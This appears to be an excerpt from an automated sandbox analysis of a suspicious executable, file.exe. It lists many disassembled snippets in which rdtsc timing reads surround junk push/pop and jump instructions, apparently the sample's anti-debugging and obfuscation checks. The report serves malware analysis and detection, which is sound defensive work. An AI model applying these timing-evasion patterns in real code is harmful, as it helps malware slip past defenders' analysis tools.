                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1144411 second address: 1144458 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], eax 0x0000000b push esi 0x0000000c mov edx, dword ptr [ebp+122D2D0Fh] 0x00000012 pop edx 0x00000013 push 00000004h 0x00000015 sub edi, dword ptr [ebp+122D2B1Bh] 0x0000001b jg 00007FC83CB64D3Bh 0x00000021 add di, 85DBh 0x00000026 nop 0x00000027 jmp 00007FC83CB64D3Ah 0x0000002c push eax 0x0000002d pushad 0x0000002e jp 00007FC83CB64D3Ch 0x00000034 push eax 0x00000035 push edx 0x00000036 jg 00007FC83CB64D36h 0x0000003c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 114444C second address: 1144458 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 jg 00007FC83CB776A6h 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1180E2A second address: 1180E32 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11811E2 second address: 1181200 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FC83CB776B8h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1181200 second address: 1181211 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 je 00007FC83CB64D36h 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1181211 second address: 1181215 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1181215 second address: 118121F instructions: 0x00000000 rdtsc 0x00000002 jg 00007FC83CB64D36h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 118121F second address: 1181226 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1181226 second address: 118122C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11885F5 second address: 11885F9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11885F9 second address: 1188627 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FC83CB64D3Fh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007FC83CB64D47h 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1188627 second address: 118862D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 118B53B second address: 118B545 instructions: 0x00000000 rdtsc 0x00000002 je 00007FC83CB64D42h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 118B545 second address: 118B54B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 118B54B second address: 118B57D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007FC83CB64D48h 0x0000000d jo 00007FC83CB64D42h 0x00000013 pushad 0x00000014 popad 0x00000015 jmp 00007FC83CB64D3Ah 0x0000001a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 118AF29 second address: 118AF40 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC83CB776B2h 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 118B07B second address: 118B0A1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007FC83CB64D47h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c pushad 0x0000000d popad 0x0000000e pushad 0x0000000f popad 0x00000010 pushad 0x00000011 popad 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 118B0A1 second address: 118B0A6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 118B0A6 second address: 118B0E8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC83CB64D44h 0x00000007 jmp 00007FC83CB64D45h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push ecx 0x0000000f jmp 00007FC83CB64D3Fh 0x00000014 pushad 0x00000015 push eax 0x00000016 pop eax 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 118D46E second address: 118D495 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 jng 00007FC83CB776E5h 0x0000000b jmp 00007FC83CB776B2h 0x00000010 push eax 0x00000011 push edx 0x00000012 ja 00007FC83CB776A6h 0x00000018 pushad 0x00000019 popad 0x0000001a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 118D495 second address: 118D499 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 118D5CA second address: 118D5CE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 118D5CE second address: 118D5E5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FC83CB64D3Ah 0x00000009 pop edx 0x0000000a pop eax 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 118D5E5 second address: 118D5EB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 118D5EB second address: 118D5EF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 118D5EF second address: 118D5F3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 118D5F3 second address: 118D607 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007FC83CB64D36h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jne 00007FC83CB64D38h 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 118D607 second address: 118D60F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 pop eax 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 118D60F second address: 118D613 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 118D613 second address: 118D619 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 118EF1E second address: 118EF29 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jno 00007FC83CB64D36h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 118EF29 second address: 118EF2F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1190824 second address: 119082E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jbe 00007FC83CB64D36h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 119082E second address: 1190832 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11953F1 second address: 11953F7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11953F7 second address: 11953FB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11953FB second address: 11953FF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 119470B second address: 1194748 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 ja 00007FC83CB776A6h 0x00000009 jmp 00007FC83CB776B7h 0x0000000e jmp 00007FC83CB776AEh 0x00000013 jg 00007FC83CB776A6h 0x00000019 popad 0x0000001a push eax 0x0000001b push edx 0x0000001c jp 00007FC83CB776A6h 0x00000022 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1194748 second address: 1194767 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007FC83CB64D3Eh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pop edx 0x0000000c pop eax 0x0000000d jnp 00007FC83CB64D44h 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1194A1C second address: 1194A22 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1194A22 second address: 1194A41 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FC83CB64D49h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1194A41 second address: 1194A61 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007FC83CB776B6h 0x0000000a pushad 0x0000000b pushad 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1194BE6 second address: 1194C0D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007FC83CB64D36h 0x0000000a jmp 00007FC83CB64D43h 0x0000000f jc 00007FC83CB64D36h 0x00000015 popad 0x00000016 push ebx 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1197A97 second address: 1197AC1 instructions: 0x00000000 rdtsc 0x00000002 jng 00007FC83CB776A6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FC83CB776B8h 0x00000011 jne 00007FC83CB776A6h 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1197C39 second address: 1197C3D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 119C48A second address: 119C4AA instructions: 0x00000000 rdtsc 0x00000002 jne 00007FC83CB776A6h 0x00000008 jno 00007FC83CB776A6h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 jnc 00007FC83CB776A8h 0x00000016 jnp 00007FC83CB776ACh 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 119C65B second address: 119C65F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 119C65F second address: 119C671 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jnp 00007FC83CB776AEh 0x0000000e pushad 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 119C671 second address: 119C696 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jo 00007FC83CB64D51h 0x0000000a jmp 00007FC83CB64D49h 0x0000000f push ecx 0x00000010 pop ecx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 119C696 second address: 119C69D instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push ecx 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 119C7F5 second address: 119C814 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jp 00007FC83CB64D4Ah 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 119C984 second address: 119C99E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 jmp 00007FC83CB776B5h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 119C99E second address: 119C9CE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC83CB64D3Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jnc 00007FC83CB64D4Dh 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 119C9CE second address: 119C9D4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 119C9D4 second address: 119C9D8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 119C9D8 second address: 119C9DE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 114461E second address: 114468B instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pushad 0x00000004 popad 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 ja 00007FC83CB64D3Ah 0x0000000f nop 0x00000010 push 00000000h 0x00000012 push eax 0x00000013 call 00007FC83CB64D38h 0x00000018 pop eax 0x00000019 mov dword ptr [esp+04h], eax 0x0000001d add dword ptr [esp+04h], 00000016h 0x00000025 inc eax 0x00000026 push eax 0x00000027 ret 0x00000028 pop eax 0x00000029 ret 0x0000002a mov ebx, dword ptr [ebp+124856CDh] 0x00000030 mov dword ptr [ebp+122D2943h], esi 0x00000036 add eax, ebx 0x00000038 push 00000000h 0x0000003a push edx 0x0000003b call 00007FC83CB64D38h 0x00000040 pop edx 0x00000041 mov dword ptr [esp+04h], edx 0x00000045 add dword ptr [esp+04h], 0000001Ah 0x0000004d inc edx 0x0000004e push edx 0x0000004f ret 0x00000050 pop edx 0x00000051 ret 0x00000052 mov cx, 95B5h 0x00000056 push eax 0x00000057 push eax 0x00000058 push edx 0x00000059 push eax 0x0000005a push edx 0x0000005b push ecx 0x0000005c pop ecx 0x0000005d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 114468B second address: 114468F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 114468F second address: 1144695 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1144695 second address: 11446DE instructions: 0x00000000 rdtsc 0x00000002 jnl 00007FC83CB776ACh 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov dword ptr [esp], eax 0x0000000d sub di, 4D00h 0x00000012 push 00000004h 0x00000014 push 00000000h 0x00000016 push edi 0x00000017 call 00007FC83CB776A8h 0x0000001c pop edi 0x0000001d mov dword ptr [esp+04h], edi 0x00000021 add dword ptr [esp+04h], 0000001Bh 0x00000029 inc edi 0x0000002a push edi 0x0000002b ret 0x0000002c pop edi 0x0000002d ret 0x0000002e clc 0x0000002f nop 0x00000030 jc 00007FC83CB776B4h 0x00000036 push eax 0x00000037 push edx 0x00000038 push eax 0x00000039 push edx 0x0000003a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11446DE second address: 11446E2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11446E2 second address: 11446FF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 pushad 0x00000008 pushad 0x00000009 jmp 00007FC83CB776B2h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11447A5 second address: 11447DA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov dword ptr [esp], eax 0x00000007 push 00000000h 0x00000009 push ecx 0x0000000a call 00007FC83CB64D38h 0x0000000f pop ecx 0x00000010 mov dword ptr [esp+04h], ecx 0x00000014 add dword ptr [esp+04h], 00000017h 0x0000001c inc ecx 0x0000001d push ecx 0x0000001e ret 0x0000001f pop ecx 0x00000020 ret 0x00000021 mov di, D97Ah 0x00000025 push 0000001Eh 0x00000027 nop 0x00000028 push eax 0x00000029 push edx 0x0000002a pushad 0x0000002b pushad 0x0000002c popad 0x0000002d push eax 0x0000002e pop eax 0x0000002f popad 0x00000030 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 119D910 second address: 119D916 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11A5A0A second address: 11A5A10 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10F68B5 second address: 10F68C0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10F68C0 second address: 10F691C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC83CB64D49h 0x00000007 jmp 00007FC83CB64D45h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e popad 0x0000000f push edi 0x00000010 jmp 00007FC83CB64D3Ch 0x00000015 pushad 0x00000016 jmp 00007FC83CB64D47h 0x0000001b push edx 0x0000001c pop edx 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11A3B81 second address: 11A3B90 instructions: 0x00000000 rdtsc 0x00000002 jc 00007FC83CB776A6h 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push ecx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11A4926 second address: 11A492A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11A4BEF second address: 11A4BF3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11A4F45 second address: 11A4F49 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11A4F49 second address: 11A4F53 instructions: 0x00000000 rdtsc 0x00000002 js 00007FC83CB776A6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11AACB5 second address: 11AACC7 instructions: 0x00000000 rdtsc 0x00000002 jng 00007FC83CB64D36h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jng 00007FC83CB64D36h 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11ADB42 second address: 11ADB46 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11ADB46 second address: 11ADB4C instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11ADB4C second address: 11ADB55 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11ADDCC second address: 11ADE06 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 jmp 00007FC83CB64D43h 0x0000000a push eax 0x0000000b jmp 00007FC83CB64D46h 0x00000010 pop eax 0x00000011 push eax 0x00000012 push edx 0x00000013 jns 00007FC83CB64D36h 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11ADE06 second address: 11ADE0A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11AE0B3 second address: 11AE0C2 instructions: 0x00000000 rdtsc 0x00000002 jno 00007FC83CB64D36h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11AE0C2 second address: 11AE0D3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007FC83CB776A6h 0x0000000a jg 00007FC83CB776A6h 0x00000010 popad 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11AE3E4 second address: 11AE403 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007FC83CB64D47h 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11AE403 second address: 11AE409 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11B4537 second address: 11B4541 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007FC83CB64D36h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11B469E second address: 11B46A2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11B46A2 second address: 11B46A6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11B46A6 second address: 11B46C4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 pop eax 0x00000009 jmp 00007FC83CB776B3h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11B46C4 second address: 11B46CA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11B4C4F second address: 11B4C53 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11B508B second address: 11B508F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11B51F2 second address: 11B51F6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11B59B3 second address: 11B59CE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FC83CB64D47h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11B59CE second address: 11B59D8 instructions: 0x00000000 rdtsc 0x00000002 jne 00007FC83CB776A6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11B6150 second address: 11B6155 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11B4020 second address: 11B4053 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007FC83CB776A6h 0x00000008 jmp 00007FC83CB776AFh 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push edi 0x00000010 jmp 00007FC83CB776AFh 0x00000015 jc 00007FC83CB776A6h 0x0000001b pop edi 0x0000001c pushad 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11B4053 second address: 11B4059 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
